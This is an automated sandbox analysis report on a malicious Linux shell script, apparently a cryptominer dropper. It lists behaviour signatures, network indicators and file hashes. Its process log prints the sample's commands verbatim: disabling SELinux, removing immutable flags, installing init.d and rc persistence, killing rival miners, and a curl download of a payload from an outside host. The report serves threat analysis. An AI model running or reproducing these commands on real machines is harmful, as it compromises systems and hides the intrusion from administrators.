Malware Analysis Report

2024-12-07 16:23

Sample ID 241113-3bxq7a1ejb
Target HMtWYpJGZVUZkrQK.sh
SHA256 3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b
Tags
defense_evasion discovery persistence antivm privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b

Threat Level: Shows suspicious behavior

The file HMtWYpJGZVUZkrQK.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery persistence antivm privilege_escalation

Executes dropped EXE

File and Directory Permissions Modification

Enumerates running processes

Write file to user bin folder

Attempts to change immutable files

Disables SELinux

Modifies init.d

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Checks CPU configuration

Reads CPU attributes

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 23:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

128s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sed4AVVs6 /bin/sed N/A
File opened for modification /etc/init.d/sed95Ns9Y /bin/sed N/A
File opened for modification /etc/init.d/sedivgDd0 /bin/sed N/A
File opened for modification /etc/init.d/sedUHt3QU /bin/sed N/A
File opened for modification /etc/init.d/sedf0ume1 /bin/sed N/A
File opened for modification /etc/init.d/sedFhHFT5 /bin/sed N/A
File opened for modification /etc/init.d/sedxP3LUa /bin/sed N/A
File opened for modification /etc/init.d/sedZQsazd /bin/sed N/A
File opened for modification /etc/init.d/sedy6LbFS /bin/sed N/A
File opened for modification /etc/init.d/sedjEUNSW /bin/sed N/A
File opened for modification /etc/init.d/seduODJR1 /bin/sed N/A
File opened for modification /etc/init.d/sedPHaP3Z /bin/sed N/A
File opened for modification /etc/init.d/sedHcZzv2 /bin/sed N/A
File opened for modification /etc/init.d/sedqSWgm6 /bin/sed N/A
File opened for modification /etc/init.d/sed6ZnCQ4 /bin/sed N/A
File opened for modification /etc/init.d/sedhV0UxX /bin/sed N/A
File opened for modification /etc/init.d/sed2Wb2GX /bin/sed N/A
File opened for modification /etc/init.d/sedniYnE7 /bin/sed N/A
File opened for modification /etc/init.d/sed6AQ9Lb /bin/sed N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedzJUsG1 /bin/sed N/A
File opened for modification /etc/init.d/sedItU9o3 /bin/sed N/A
File opened for modification /etc/init.d/sedVHPgf6 /bin/sed N/A
File opened for modification /etc/init.d/sedSqez28 /bin/sed N/A
File opened for modification /etc/init.d/sedpoTtb8 /bin/sed N/A
File opened for modification /etc/init.d/sedpxfBNa /bin/sed N/A
File opened for modification /etc/init.d/sedkz6RZ9 /bin/sed N/A
File opened for modification /etc/init.d/sedQvKbJd /bin/sed N/A
File opened for modification /etc/init.d/sed9ofuDY /bin/sed N/A
File opened for modification /etc/init.d/sedIOKVd3 /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sed9jkXc4 /bin/sed N/A
File opened for modification /etc/init.d/sed7uNT72 /bin/sed N/A
File opened for modification /etc/init.d/sedBeMLr8 /bin/sed N/A
File opened for modification /etc/init.d/sedWFScV8 /bin/sed N/A
File opened for modification /etc/init.d/sedAxh40X /bin/sed N/A
File opened for modification /etc/init.d/seduA5xv0 /bin/sed N/A
File opened for modification /etc/init.d/sedHZKD74 /bin/sed N/A
File opened for modification /etc/init.d/sedEGBpj7 /bin/sed N/A
File opened for modification /etc/init.d/sedAPrblb /bin/sed N/A
File opened for modification /etc/init.d/sed0GUKie /bin/sed N/A
File opened for modification /etc/init.d/sedDFOGpV /bin/sed N/A
File opened for modification /etc/init.d/sedWoCetZ /bin/sed N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1489/status /usr/bin/pkill N/A
File opened for reading /proc/1045/status /usr/bin/pkill N/A
File opened for reading /proc/458/cmdline /usr/bin/pkill N/A
File opened for reading /proc/755/status /usr/bin/pkill N/A
File opened for reading /proc/311/cmdline /usr/bin/pkill N/A
File opened for reading /proc/26/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1145/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1283/cmdline /usr/bin/pkill N/A
File opened for reading /proc/511/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1155/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1491/status /usr/bin/pkill N/A
File opened for reading /proc/1078/status /usr/bin/pkill N/A
File opened for reading /proc/406/cmdline /usr/bin/pkill N/A
File opened for reading /proc/404/status /usr/bin/pkill N/A
File opened for reading /proc/168/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1489/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1364/cmdline /usr/bin/pkill N/A
File opened for reading /proc/159/status /usr/bin/pkill N/A
File opened for reading /proc/425/cmdline /usr/bin/pkill N/A
File opened for reading /proc/408/status /usr/bin/pkill N/A
File opened for reading /proc/159/cmdline /usr/bin/pkill N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/902/status /usr/bin/pkill N/A
File opened for reading /proc/83/status /usr/bin/pkill N/A
File opened for reading /proc/1117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/25/cmdline /usr/bin/pkill N/A
File opened for reading /proc/598/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1134/status /usr/bin/pkill N/A
File opened for reading /proc/1270/status /usr/bin/pkill N/A
File opened for reading /proc/1364/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/978/status /usr/bin/pkill N/A
File opened for reading /proc/1059/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/311/status /usr/bin/pkill N/A
File opened for reading /proc/137/status /usr/bin/pkill N/A
File opened for reading /proc/858/status /usr/bin/pkill N/A
File opened for reading /proc/436/status /usr/bin/pkill N/A
File opened for reading /proc/168/cmdline /usr/bin/pkill N/A
File opened for reading /proc/970/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1140/status /usr/bin/pkill N/A
File opened for reading /proc/162/status /usr/bin/pkill N/A
File opened for reading /proc/1306/status /usr/bin/pkill N/A
File opened for reading /proc/672/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1160/status /usr/bin/pkill N/A
File opened for reading /proc/315/status /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /usr/bin/pkill N/A
File opened for reading /proc/159/status /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/1117/status /usr/bin/pkill N/A
File opened for reading /proc/446/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/1118/status /usr/bin/pkill N/A
File opened for reading /proc/98/status /usr/bin/pkill N/A
File opened for reading /proc/776/status /usr/bin/pkill N/A
File opened for reading /proc/1127/cmdline /usr/bin/pkill N/A
File opened for reading /proc/157/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A
File opened for reading /proc/568/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/1092/cmdline /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.BubyqF /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.yJP6CF /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin/lsof]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/acpid]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/anacron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apparmor]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apport]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/avahi-daemon]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/bluetooth]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups-browsed]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dns-clean]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/gdm3]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/grub-common]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/irqbalance]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kerneloops]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/network-manager]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth-log]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/pppd-dns]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsync]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/saned]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/speech-dispatcher]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/spice-vdagent]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ufw]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/unattended-upgrades]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/uuidd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/whoopsie]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/usr/bin/sort

[sort -u]

/bin/grep

[grep -o /proc/[0-9]\+]

/bin/mount

[mount]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 0889.org udp
US 1.1.1.1:53 0889.org udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp

Files

/etc/sedTc6x7S

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedy6LbFS

MD5 2ba41d3445b3052d9d2d170b7a9c30dc
SHA1 2aac9677a1a8815cf504e95c4191efa4e8bf277c
SHA256 d1bed899252d0ce9df29a9f46f2883f3a66ac084557757b2ee0300fc03f442e1
SHA512 40694eee83d8c9f2b22651cb51bf3827659ef8e58e5d127b117b7fdf8c42685525e9bbb8270c8e47043a71ff62218d9dc977d29aff5b7a0205c461af70cd53d8

/etc/init.d/sedjEUNSW

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sedDFOGpV

MD5 cda555b495531d9519e1759015d8254b
SHA1 d24025f32795eb1156c8cf6ed431b0d62c371e0b
SHA256 bada520ca2c152cc2a4ce0507dae5525bd3edc0b83c1ac4b460b77a90e4667d4
SHA512 8a67db9e0dc5f95ec72f9bc07b7b9748ad23b272acaebff9cc1748b59e493ab6761e5e68fc9fe0e0b3783a13eba652b7f6bd5761cf0bbe4f684dabe21e543f46

/etc/init.d/sedUHt3QU

MD5 458ba0335ba2c1c2dce836092bc736d6
SHA1 ae5d8e397170d4aa1449ad21202c192822965300
SHA256 e6e7f380dcf27f1af57e69b89683892cf84364a1c70a6830a869da24834a481a
SHA512 3e6aea402485a84f63d8a1e984b67f4c9ef8c002f62998953c86dfbc9895057af5c9f9e201d2e478b74c49d8f8f0a526899225cdf65850f54e0992e50e8fcb9f

/etc/init.d/sed95Ns9Y

MD5 3d51dc9135014bb49b4a19ff8dab61f1
SHA1 da7e67342302a2ccb0b28b3fdc3005fded638dd8
SHA256 b80a447135b01da97780c2c5b7876ded18d788940a5365bc308d68b0d1a736cc
SHA512 9e90166259db2e64554529003cc090bce5d4b3585dd05ae2c8392058340f96b7d32a04641436a0291e2e5892391420cd3c6eca10a27b241d3dacc47b85c0b152

/etc/init.d/sedWoCetZ

MD5 ce2de503acc3de02f544571e89d4d717
SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sed9ofuDY

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedAxh40X

MD5 7e648c77846d70c4ef1b49c0c4f7cfad
SHA1 92bff2c0b65410bfeb8cde8089888f4a22b73e44
SHA256 2e317e678625e7c41348f15d2fb8fd65fd2ba732da05bf89660de2b36558e405
SHA512 054e9102ab3f8799d8ff6c07d82ba571fb72ce9d5eab8fca50ff055608333e6f6ef2805cf349cd2c9ae793fc9c2fad8e11f52d455517e3ea118f0780b89d0a4a

/etc/init.d/sedhV0UxX

MD5 33ed7811d65a775cf10f04c2e6ee3cbf
SHA1 004e8008b0f8dda526e982e148eb39c207af44b8
SHA256 29ad66aed4b605c1ff65d42c89f5b68f570c88c1d5764f45dcf15384302b86fe
SHA512 1f732ab834a000734d06a5242e0fd174a09aa76771b00d27d5c15169bcf26cec8c04af6395eb42382ce1585247f83065cecbf6b7661ad91e38b4f5a202f7b0c6

/etc/init.d/sed2Wb2GX

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sedzJUsG1

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/seduODJR1

MD5 e65fcf1c65d0f1dfd2495caba916da2c
SHA1 954ce99138d3ba784163c8aaf940697b5052a1f2
SHA256 2117dc14baa0865740861453d359ff186d793a82ee9d8cb848f673814b114ed5
SHA512 1b8a2c9cb7a435326ac3281d22346acc648096a59a6cf94b8a9f5063ce3341c3e2b5e527477d7554862f57776798d2e5d002a90f024cb3e8514cc16bb919cceb

/etc/init.d/sedf0ume1

MD5 193d680f0eec5280efef2e9cf9db9669
SHA1 775d985dd5e016882657620a66aa149ac438a25f
